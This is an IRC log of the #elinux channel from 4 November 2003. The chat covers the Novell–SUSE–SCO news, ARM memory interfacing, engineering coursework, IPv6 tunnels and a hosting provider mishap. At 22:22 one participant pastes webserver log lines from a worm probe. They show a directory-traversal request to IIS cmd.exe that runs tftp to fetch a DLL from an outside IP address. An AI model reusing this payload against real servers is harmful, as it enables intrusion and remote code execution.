irclog2html for #elinux on 20031104

00:03.07Russoi, the uclinux config system is b0rked
00:14.18fishheadTimriker ah
00:14.28fishheadsounds beyond me for now :/
00:14.31fishheadbut thanks
00:23.22*** join/#elinux ricmm (ricky@
00:23.25ricmmhello people!
00:23.37CosmicPenguinslcers - beautiful sunset tonight
00:23.41ricmmhey CosmicPenguin
00:23.56ricmmwhats up
00:27.15ricmmesta bien
00:32.50fishheadwell I just butchered my laptop
00:33.05fishheadripped off the function key
00:33.14fishheadbecause it lets you go into bios setup in the middle of linux
00:33.21fishheadneedless to say that kinda kills linuix
00:53.34*** join/#elinux TheMasterMind1 (
01:45.13TimRikerfishhead: I go in and out of bios on my dell without killing linux.
02:03.35RussI wish acpi suspend worked right on my viao...
02:03.38Russnever wakesup
02:15.38*** part/#elinux chouimat (
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02:36.07*** part/#elinux ricmm (ricky@
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02:55.18fishheadtimriker well mine doesn't
03:02.19chouimatCosmicPenguin: if you learn what it is tell me
04:11.43RussTimRiker: there are many versions of that song floating about
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08:05.49fishheadCANUCKS! CANUCKS!
09:53.43*** join/#elinux mallum (
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15:12.29onkarshind1Is there any channel for realtime linux OS
15:14.29*** part/#elinux onkarshind1 (~Administr@
16:08.16*** join/#elinux TimRiker (
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16:23.10TomWtalk about wierdness, Novell announces it will purchase SUSE, IBM tosses in $50 million, and SCOX stock is up 10%.  Maybe they think that Novell is going to purchase SCO with that $50 million?
16:23.56CosmicPenguinNovell wouldn't
16:23.58CosmicPenguinwould they?????
16:24.34TomWmaybe they are going to sue SCO for contract abuse?
16:24.55TomWwierder & wierder
16:24.59CosmicPenguinThe judge would scream bloody murder, wouldn't he?
16:25.21CosmicPenguinA litigant in a case can't give money to a third party to sue the same people, right?
16:25.38CosmicPenguinIf so, that scares the hell out of me
16:26.27CosmicPenguinI can imagine microsoft giving all its ISVs 10 million dollars.  Here, go sue these people, will you?
16:27.37TomWwhat? you don't think that that doesn't happen?
16:28.05CosmicPenguinIs it legal though?
16:28.55TomWIBM owns a healthy stake in RedHat, they were one of the original purchasers of the privately held stock before it went public.  IIRC, Intel also owns a peice of RH.
16:29.17CosmicPenguinThats a bit different though...
16:29.27fishheadHOLY MOTHER OF CANUCK!, Novell is buying Suse
16:29.41leviCrazy stuff.
16:29.41CosmicPenguinIt not like IBM sent RedHat a 50 million dollar gift certificate  for legal services
16:29.52TomWCosmicPenguin: I don't see how there is any impropriety in what you are suggesting.
16:29.58mallumwhat is this fishhead bot
16:30.14CosmicPenguinTomW: not that I mind, of course
16:30.26CosmicPenguinTomW: but I would really hate for one of our foes to do the same thing  
16:30.40TomWCosmicPenguin: bullies in a schoolyard fighting over IP rights.
16:30.42mallumfishhead: why do you keep posting the same thing in multiple channels ?
16:31.11fishheadmallum I felt it was important news :)
16:31.12CosmicPenguinmallum: he just learned how cut n' paste works
16:32.04CosmicPenguinlevi: its snowing again
16:32.11sjhillfishhead: but we all read /. well, even if we don't admit it
16:32.15CosmicPenguinlevi: I don't think it snowed this many days in a row lall last winter
16:32.17TomWCosmicPenguin: IMHO, IBM is helping Novell cloud the whole IP issue over linux vs. unix.
16:32.44CosmicPenguinTomW: I agree.  I don't know if thats the most effective argument
16:33.18fishheadsjhill I didn't see it on slashdot
16:33.22CosmicPenguinTomW: But I like how IBM is willing to fight the IP issues now rather than later - might as well determine if its worth it before getting 15 years and a few billion dollars down the line
16:33.27fishheadelse I wouldn't have pasted it
16:33.35leviCosmicPenguin: It seems like we had about this much during the beginning of Spring, when it was supposed to be warm.
16:33.39CosmicPenguinfishhead: it was on /.
16:33.51CosmicPenguinfishhead: from now on, assume that we're geeky enough to have seen it
16:34.13CosmicPenguinlevi: I'm not complaining though - Big Cottonwood got 56 inches this weekend
16:34.38leviIf it keeps up, we'll have a great ski season.
16:34.49leviMaybe we'll get enough to end this stupid drought.
16:34.52CosmicPenguinThe operative words being "if it keeps up"
16:35.00TomWCosmicPenguin: publically though, it does stir the pot and add a layer of confusion as to "Novell owned SysV, then contracted some rights to SCO, then SCO sues IBM, then IBM helps Novell acquire SUSE"... Does Novell wish to get sued as well by SCO?  Does Novell know something that SCO is not saying about IP rights over UNIX?  Curiouser and Curiouser
16:35.02CosmicPenguinWhat we need new is a few days of sunshine to set that base, and then more snow on top of it
16:35.34CosmicPenguinTomW: definately.  I think Novell has been trying to bait SCO into a fight for a while now.  They know something that we don't
16:35.49CosmicPenguinLike I said in the other room - there will be lots of rocks flying between Lindon and Provo now
16:36.12TomWseems that way, let the stupid bastids have their day before we crush the foolish ones.
16:36.28CosmicPenguinThats whats so interesting to me - these aren't too companies fighting across the country
16:36.45CosmicPenguinAll the right people in Provo run in the same circles - these guys all know each other personally
16:36.59CosmicPenguinThey probably all live within a few miles of each other
16:37.14TomWCosmicPenguin: yeah, so what's your point? maybe they know each other but don't like each other?
16:37.36TomWCosmicPenguin: power games (games of State)?
16:38.09CosmicPenguinTomW: its just interesting
16:38.19TomWyes, it is.  heh
16:38.21CosmicPenguinTomW: and the good news is, if Novell gets involved, then the Utah press is going to be up a creek
16:38.35CosmicPenguinTomW: they are currently cheering for SCO because its a "Utah" company fighting the big boys
16:38.52CosmicPenguinBut If Novell gets in there, the tune may change.  SCO is a Utah company, but Novell is a Utah legend
16:38.59*** join/#elinux kergoth ([
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16:39.48TomWSomeone plays a mean game of "corporate chess", eh?
16:40.19TomW~quote rhat scox
16:40.35TomW~quote scox
16:40.54TomWsomebody knows something the rest of us don't know.
16:41.18CosmicPenguinTomW: thats why I'm an engineer
16:41.21TomWlooks like somebodies are selling their rhat stock to purchase scox stock in anticipation?
16:42.10CosmicPenguinchouimat: you gota problem with us?
16:42.20TomWhmm, if RHAT drops any lower, I just may pick up a 100 for myself.
16:42.30chouimatCosmicPenguin: no the realaudio stream
16:42.44CosmicPenguinOhh... :)
16:42.55TomWCosmicPenguin: touchy touchy
16:43.13CosmicPenguinahh, chouimat knows I'm joshin around
16:43.48chouimatCosmicPenguin: look I won't be self employed if I didn't have a sense of humor and doing opensource too
16:43.49TomWI've been puzzling over the way that the ARM processors handle the bus interface to Static RAM.  It is confusing.
16:44.58TomWdon't some of the ARM processors do some kind of internal bit shifting of the address bus when accessing various widths of memory?  like shift A1 down into A0?
16:45.23CosmicPenguinTomW: I know the XScale DMA and AAU do stuff like that
16:46.21TomWok, I thought that the webpal (Cirrus CLPS-7500FE) did the same thing, it is an ARM710 processor.  But, reading the docs on the Sharp LH79520, an ARM720 processor, it doesn't bit shift.
16:47.15TomWmaybe I am confused about the ARM710 and it was the SA1100 that did the bit shift.  I got to go back to the docs I guess.
16:47.49TomWI do way too much 8051 work, this 32 bit stuff hurts my head
16:48.05CosmicPenguindamn 32 bit
16:48.05TomWno shit
16:48.39TomWbig vs. little endian, bit shift vs. hardware shift, sheesh
16:49.20TomWfortunately, Sharp publishes the EVB schematics so I could verify the interface to the SRAM.
16:52.09TomWWhat bugs me is that with all these flavors of "embeddable" ARM processors out there is that the Real Time Clock of these processors is not able to be powered by a lithium cell just to keep the RTC alive when the core power supply gets removed.  It seems that they all will power thier clocks (PLL + RTC) only if you put them in SLEEP mode first.  And, at that, they draw upwards of 30ua of current, way too high for long term lithium backup.
16:52.57TomWDoesn't anyone understand that timekeeping might have to be kept running while the processor gets powered off?
16:56.48CosmicPenguinThats crazy talk
16:57.45*** join/#elinux prpplague (~billybob@
16:58.16kergothhey dave
16:59.36chouimathi prpplague
17:00.05fishheadtomw geez even I know that
17:00.05prpplaguehowdy all
17:00.28prpplaguejust got moved into my new work area :(
17:02.05kergothyou should be angry at the world instead.  beat something, preferably inanimate to avoid lawsuits
17:02.09chouimatprpplague: I'm depress because it's boring like hell here ... and it's -2C outside
17:02.20CosmicPenguinI'm betting Ximian wasn't purchased for the past, but for the future *cough* Mono *cough*
17:02.35CosmicPenguinprpplague: that is prime grade horsepucky
17:02.59CosmicPenguinkergoth: the OZ website is hosted by SF isn't it?
17:03.08kergothCosmicPenguin: unfortunately yes
17:03.45CosmicPenguinkergoth: how does the CVS for the website work in that situation?
17:03.58CosmicPenguinDoes it just live in the htdocs directory with a softlink?
17:04.30kergothits just a cvs checkout that gets periodically updated
17:05.46CosmicPenguinI can't get mine to work
17:28.04*** join/#elinux sieve|work (~sieve@
17:28.29kergothhey sieve|work
17:34.06sieve|workhey kergoth and company
17:54.03*** join/#elinux sorphin (
17:54.21sorphin~bitchslap sjhill
17:54.24ACTION beats the sh*t out of sjhill
17:57.07sjhillsorphin: hey lackey
17:57.41sorphinsjhill: sup fellow lackey
18:22.19Russbunch of lackeys
18:22.33sorphinRuss: go play w/ cisco :P
18:25.46CosmicPenguincisco sucks!
18:26.01sorphinCosmicPenguin: merry ho ho ho to you too CP
18:26.08sieveindeed, cisco does suck
18:27.05CosmicPenguinSorry - thats just a automatic response
18:27.09CosmicPenguinI have no control over it
18:37.38Russlike whenever someone mentions gentoo, and half the channel asks if you are on crack?
18:38.08sorphinRuss: are you on crack?
18:38.22sorphinibot: is Russ on crack?
18:38.24sorphin: I'm not sure, is it larger than a breadbox?
18:38.27Russno :(
18:38.34CosmicPenguinRuss: exactly
18:38.36CosmicPenguinRuss: gentoo
18:38.37Russotherwis, there would be an explaination for my behaivor
18:53.49CosmicPenguinkergoth: does the 5500 support an external microphone?
18:54.15kergothCosmicPenguin: yep, plug in headphones and talk into the left speaker :P
18:55.09CosmicPenguinkergoth: so thats a no? :)
18:55.21kergoththats a yes. get a headset with a mic and it works fine
18:55.27kergothit just uses the left channel for in
18:55.38kergothso you can test with ordinary headphones
18:56.16kergothnow, ljp modified his 5000d
18:56.22kergothretrofitted it with an internal mic
18:56.41CosmicPenguinWe're gonna be launching rockets with the 5500
18:56.52sorphinmy poor Z has been sitting plugged in but idle for months now
18:56.55sorphinkinda like my laptop
18:57.09kergothheh, mine too
18:57.27CosmicPenguinkergoth: thats only because you have the latest and greatest... :)
18:58.03kergothwell, the latest and greatest are collecting dust too
18:58.38*** join/#elinux MonMotha (
19:01.07sorphinkergoth: cuz you're too busy being a TI lackey ;)
19:04.24sorphini thought that was a chick school
19:04.46MonMothasorphin: it used to be an all guys school....
19:04.48MonMothanow it's coed
19:05.05MonMothanot very co-ed, but co-ed
19:05.26sorphingot an awful feminine name :P
19:05.38sorphinMonMotha: why no ipv6 now? :P
19:05.43MonMothafounded by Chanucy Rose; lots of money given by the Hulmans
19:05.52MonMothathey don't have IPv6 here and I'm too lazy to set up a double tunnel
19:06.06sorphinbefore was having tunnel server probs
19:06.13sorphini tried again the other day
19:06.15sorphingot a tunnel
19:06.20sorphinthen my dsl/phone goes out
19:06.23MonMothaI guess I could do 6to4
19:06.54sorphinstill never have gotten the tunnels to work
19:08.05MonMothait can be a pain in the ass
19:08.14MonMothaespecially when you want to go on mining expeditions
19:08.30sorphinMonMotha: bad joke? :P
19:09.15MonMothait's actually from the linux docs
19:09.30CosmicPenguinWhich are a pretty bad joke in them selves
19:09.45sorphinCosmicPenguin: Linux has docs? wow
19:11.43sorphinMonMotha: please say you're not there for comp-sci
19:11.55sorphinMonMotha: comp-eng, sure, just not comp-sci :P
19:13.56MonMothasorphin: Comp-Eng as primary major
19:14.01MonMothaCS as a secondary possibly
19:14.11MonMothabut I do get to take most of the digital EE classes at least
19:14.13sorphinCosmicPenguin: uh oh, why now?
19:14.27sorphinMonMotha: that's cuz you're doing comp-eng
19:14.43Russdon't minor is CS
19:14.46Russminor in EE
19:14.46MonMothait's basically EE with all the high-end analog curriculum ripped out and replaced with CS
19:14.58CosmicPenguinsorphin: I am on two shared servers - one with ssh access, the other not
19:15.11CosmicPenguinWell, they just added ssh to the other box, and they wanted me to switch
19:15.19Russmy university added a lot of assembly and microprocessor/microcomputer design classes as well as CS
19:15.22sorphinCosmicPenguin: oops :P
19:15.24CosmicPenguinFine by me - because the other server is better anyway.
19:15.37MonMothathere's a few CS classes I'd really like to take, but they're so high up the curriculum curve you practically have to double major in order to satisfy the prereqs for them
19:15.46CosmicPenguinBut, I needed to add the domain, and get the mail setup before I switched the DNS, othewise I would lose mail
19:15.58MonMothaRuss: they add a couple of those too, they were EE electives before the creation of the CPE major
19:16.04sorphinCosmicPenguin: ahh
19:16.04CosmicPenguinSo I go over, and it turns out that they pulled my permission to modify the domains on the server (I used to have it)
19:16.15CosmicPenguinSo I e-mail them last Wed and tell them.  No response
19:16.23Russthe core of CSE at my uni was microcomputer programming/design
19:16.24CosmicPenguinThey e-mail me today, and say they are going to pull the server at noon
19:16.35CosmicPenguinI e-mail them back - say no way, its not set up, give me another 24 hours
19:16.40CosmicPenguinGuess what just happened
19:16.47Russa CS minor is just going to give you a bunch of CS electives
19:16.50sorphinCosmicPenguin: power off
19:17.01CosmicPenguinAnd I still don't havea  domain set up on the other side
19:17.04Russa bunch of crap that will bore the hell out of you, stuff you could learn on your own as you go
19:17.11CosmicPenguinI'm out at least 1 day of e-mail, even more
19:17.26CosmicPenguinI just got fuxored in the worst way
19:17.43MonMothaRuss: if you really want to see my course map
19:17.46sorphinCosmicPenguin: i dunno, the worst way would be having to sit in a room w/ Darl
19:17.55MonMothaI do believe I'm on last year's curriculum since I'm starting as a sophomore
19:18.21MonMothaand I just realized I totally fucked the DE quiz today
19:18.26MonMothawell, worse than I thought I did :()
19:18.33sorphinMonMotha: oops :P
19:18.49MonMothaeh, so did everyone else
19:18.52sorphin~fishslap sjhill for not talking
19:18.55ACTION slaps sjhill up side the head with a wet fish for not talking
19:18.56MonMothayou could tell the instant he lost the class :)
19:19.14RussMonMotha: I would also recommend a course on hardware design languages (verilog, etc)
19:19.47sorphinRuss: masochist
19:19.58Russdo you have courses that go over gate delay, etc?
19:20.08sorphinRuss: i don't think he's as masochistic as you and TomW ;)
19:20.32Russyou guys are slackers MonMotha
19:21.08MonMothaRuss: isn't there already one in there?
19:21.14MonMothaI know they offer a ton of those
19:21.35Russwhy all the cisco stuff?
19:22.02MonMothaRuss: the class you refer to is numbered ECE330 here IIRC: Digital Design Lab
19:22.07sorphinRuss: cuz i know you hate them ;)
19:22.23MonMothaI believe they cover both of your concerns in that class
19:22.31MonMothathat and device modeling
19:22.59Russwe get 4 hours of tech elec
19:26.46Russdigital design lab doesn't sound like a course where you'd get heavy into timing margins
19:27.01Russsounds more like where you'd put together digital circuits on a breadboard
19:27.05Russwhich is a great class
19:27.22Russcaus towards the end of the semester, you get a good portion of the class crying in the lab
19:27.50RussI see 330 has verilog though
19:27.54Russverilog rules
19:28.23Russthere is a GPL implementation
19:28.31Russits basically writing hardware with c
19:29.24MonMothaRuss: maybe it was a 400 series class where they were majorly concerned with timing margins
19:29.37Russie: if (index) a <= 0; else a <= a + mot;
19:29.38MonMothaI know it was mentioned that they offer one
19:30.01Russits good you have the 330 class though
19:31.40MonMothait's a major major class here
19:31.51Russ < 421 lab
19:31.56Russthat was my favorite class
19:33.07MonMothayou'll have to pardon me; doing DE whilet alking
19:33.18Russ <- another one of my favorites caus towards the end of the class, EE majors were on the floor pounding their fists
19:34.47Russ <- this was a really good base for embedded systems design
19:35.50Russtoo bad they didn't have that major with less CS and more hardware
19:36.12Russthey need more detail on pcb layout
19:38.40MonMothathat would be EE :)
19:41.57MonMothaI'm thinking it's unusually warm for this time of year
19:42.12MonMothaNov. 4 and it's 70 out
19:42.19MonMothathey turned the A/C off...dammit
20:27.57CosmicPenguinHeh - all of a sudden, turns back on, and I get an apologetic phone call
20:33.12fishheadall the more icing for more linux high speed networking apps ;)
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20:48.12sjhillsorphin: hey, i've been working....unlike SOME people
20:54.04fileCosmicPenguin: what happened?
20:54.13CosmicPenguinsomething happened?
20:54.44file<CosmicPenguin> Heh - all of a sudden, turns back on, and I get an apologetic phone call
20:55.41CosmicPenguinfile: long story
20:56.14fileis there a short version available?
20:57.38sorphinsjhill: being under your boss' desk doesn't count as working :P
20:57.54sorphinfile: an isp fscked him
20:58.34sorphinsjhill: you slackey
20:59.04sjhilli've been eating assembly code all eyes are blurring at this point
21:06.31sjhillsorphin: and how many lusers have you tortured today mr. bofh
21:13.35*** join/#elinux sieve (~sieve@
22:16.07CosmicPenguinPlease wait for 24 hours so the DNS can propagate
22:16.09CosmicPenguinOk, no problem
22:17.08sorphin,cos grins
22:17.29sorphinCosmicPenguin: shouldn't take that long since it hasn't been out of the root servers for 24 hours :P
22:17.43CosmicPenguinsorphin: regardless, it hasn't moved yet... :)
22:22.59sorphinwebserver shows a lot of: - - [01/Nov/2003:15:54:12 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2064.165.210.168%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 230 "-" "-" - - [01/Nov/2003:15:54:12 -0600] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2064.165.210.168%20GET%20cool.dll%20e:\httpodbc.dll HTTP/1.0" 200 230 "-" "-"
22:23.23sorphindunno why it pasted that line twice
22:23.25CosmicPenguinWell, thats nice.... :)
22:23.31sorphinlooks like a newer worm :P
22:23.35sorphinfrom intuit no less
22:23.51sorphinprolly checking to see if i didn't 'activate' any of their products... NOT
22:24.36CosmicPenguinI've been singing "You're not fully dressed without a smile" all day
22:25.00CosmicPenguinkill m now
22:25.10sorphinCosmicPenguin: put down the crack pipe
22:25.16sorphinCosmicPenguin: and nobody gets hurt
22:25.32CosmicPenguinsorphin: my wifes aunt has two beautiful show dogs - Golden Retrievers
22:25.50CosmicPenguinand one of them has been playing the part of Sandi in Annie for a few years now
22:25.59CosmicPenguinSo every damn year, we have to go see Annie
22:26.16CosmicPenguinAnd this morning, they had the cast on TV, and they sang some of the songs
22:26.23CosmicPenguinAnd I've got it stuck in my head
22:26.26sorphinCosmicPenguin: my sympathies
22:26.31CosmicPenguinBut its better than some other Annie songs, I guess
22:26.51sorphinCosmicPenguin: i didn't know there were any good ones at all :P
22:27.01CosmicPenguinIts a cute show
22:27.06CosmicPenguinI guess
22:27.11CosmicPenguinChicks dig it
22:28.42MonMothawow, that was a fun problem...
22:28.48MonMothagod curse my DE prof
22:28.53sorphinMonMotha: haha
22:29.03MonMothafor assigning that problem "to be performed without aid of a computer algebra system"
22:29.13sorphina calculator
22:29.20MonMothatook me fucking 45 minutes, mostly due to writing
22:29.29MonMothaactaully, every student here gets a copy of Maple
22:29.52MonMothareminds me of a pastie I need to make
22:29.56MonMotha"Warning: Maple 9"
22:30.07*** join/#elinux file (
22:30.09MonMothait's a real CAS...can be a fucking pain in the ass too :)
22:30.31MonMothafinally made one?
22:30.41sorphinand it's pingable
22:30.55sorphinneed to sort out the /64 crap tho
22:31.05MonMothajust get a /48 :)
22:31.08MonMothait's worth it
22:31.09sorphinthat too
22:31.13MonMotha(esp. when free :)
22:31.16sorphini mean handle the routing
22:31.19*** join/#elinux file[abydos] (~joshnet@3ffe:bc0:8000:0:0:0:0:157f)
22:31.24file[abydos]look... even I have IPv6!
22:31.30MonMothaalthough you can certainly make do with a /60
22:31.31sorphin~cluebat file
22:31.34ACTION pulls out a ClueBat (tm) and thwaps file.
22:31.38MonMothathe routing is just like CIDR in IPv4
22:32.24filePermission denied.
22:32.49sorphinchmod 000 file
22:33.00filePermission denied.
22:33.35CosmicPenguinsorphin: you gotta r00t him first
22:33.48MonMothachown file me
22:33.53MonMothachmod 000 file
22:33.58MonMothaer me file
22:33.59MonMothayou know
22:34.06MonMothafile always goes last, that way you can xargs it
22:36.30file[abydos]why doesn't reverse DNS work darn it? :\
22:37.58*** join/#elinux TMM1 (
22:43.32RussI think file will really like that link given all the crack he smokes
22:43.53RussMonMotha: its 61 out here in phoenix
22:44.09Russwhich sucks because it means the snowbirds will be migrating en masse
22:44.47CosmicPenguinRuss: especially since the north west has been hit pretty hard
22:53.41*** join/#elinux GPSFan (~kenm@
23:34.29CosmicPenguinsigh - property taxes
23:46.38*** join/#elinux GPSFan (~kenm@
23:50.58sorphintwas nice and warm here today :P
23:51.51CosmicPenguinnice and snowy here

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